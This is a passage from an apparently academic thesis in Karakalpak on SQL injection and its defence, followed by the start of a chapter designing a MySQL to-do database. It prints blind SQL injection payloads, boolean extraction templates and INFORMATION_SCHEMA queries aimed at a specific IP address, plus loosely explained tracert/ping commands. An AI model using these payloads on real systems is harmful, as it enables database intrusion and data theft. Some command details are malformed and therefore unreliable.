http://128.198.48.253/showme.php?id=1AND1=(SELECTIF((IFNULL(ASCII(SUBSTRING(({INJECTION}),{POSITION},1)),0){OPERATION}{CHAR}),1,2))/*
Siz {INJECTION} qatarın
SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()
menen almastırıwıńız múmkin hám /*,?id=1 qatarın óshirip, url ushın tómende kórsetilgen nátiyjeni alıwıńız múmkin.
http://128.198.48.253/showme.phpAND1=(SELECTIF((IFNULL(ASCII(SUBSTRING(( select group_concat(TABLE_NAME) FROM information_schema.tables WHERE
table_schema=database()),{POSITION},1)),0){OPERATION}{CHAR}),1,2))
Test nátiyjeleri programma jurnalınıń maǵlıwmatların óz ishine aladı. Bul sizge keying testlew processinde jánede effektiv ótkiziwge járdem beredi. Sonıń menen birge, {INJECTION} ornın basqada sorawlar menen almastırıwıńız múmkin, mısalı:
SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=hex_code(of table_name)
BSQL Hacker hújiminiń ekinshi avtomatıkalıq forması effektivli bolǵanı sebepli kóp hallarda sol metodttan paydalanıladı.
Command Prompt
SQL hújimdi jánede Command Prompt buyrıq qatarı járdeminde ámelge asırıwımız múmkin. Biraq ol jumıs processinde basqarıwdı komandalar arqalı alıp barǵanı sebepli jumıs processin astenletedi.
SQL inekcıya hújimin baslaw ushın tómendegi komandalar ámelge asırılıadı:
tracert url_name
Bul buyrıq arqalı kórsetilip atırǵan url adresske shekemgi marshrut anıqlanadı.
Mısalı :
tracert http://128. 198. 48. 253/showme.php
ping -t -l 1250 http://128. 198. 48. 253/showme.php
1250 nomeri onıń páseytiw koefitsientin kórsetiw ushın isletiledi.
III BAP. SQL INEKCIYALARDAN QORǴANIW PROGRAMMALIQ SISTEMASIN PROEKTLESTIRIW
3.1. Sistemanıń MySQL MBBS da maǵlıwmatlar bazasın jaratıw
SQL inekcıyalardan qorǵanıw metodların analizlew processinde maǵlıwmatlar bazası menen maǵlıwmat almasıw basqıshların kórip shıǵıwmız kerek boladı. Bunıń ushın paydalanıwshılar esletpelerin hám olardıń orınlanıw waqıtların maǵlıwmatlar bazasına jazatuǵın hám olardı brauzer interfeysinde kórsetetuǵın sistemanı islep shıǵamız. Sistema maǵlıwmatlar bazası 2 kesteden quralǵan bolıp, olar tómendegi kesteler bolıp esapanadı.
Bunda biz “todo” kestesinde id, desc, date hám done maydanların jaratamız.
Kestedegi maydanlar izbe-izligi tómendegi kóriniste boladı:
Bunda id maydanı bizde esletpeler izbe-izligin unikal saqlaw maqsetinde qollanıladı. Kestedegi desc hám date maydanları paydalanıwshı kiritken maǵlıwmatlarǵa baylanıslı bolıp, olar kiritilgen esletpe tekstin hám onıń orınlanıw waqtın kórsetedi. Done maydanı 0 yamasa 1 mánislerin qabıl etip, esletpeniń orınlanǵan yaki orınlanbaǵanın kórsetedi. Sol arqalı maǵlıwmatlar bazasındaǵı juwmaqlanǵan elementler ustinde qayta orınlaw yaki ózgertiw sıyaqlı háreketlerdi shekleydi.
Maǵlıwmatlar bazasındaǵı scrap kestesin ayrıqsha ahmiyetke iye bolǵan úlken kólemdegi xabardı saqlaw ushın paydalanamız. Bul kestedegi maydanlar strukturası tómendegi kóriniste boladı.
Desc maydanı ózinde tek ǵana 1 element saqlaytın bolıp, ondaǵı maǵlıwmat uzınlıǵı qálegen kóriniste bolıwı múmkin.
Bul kesteler ulıwma maǵlıwmatlar bazasın payda etedi hám usı struktura arqalı ondaǵı elementlerdi basqarıwımız múmkin.
Dostları ilə paylaş: |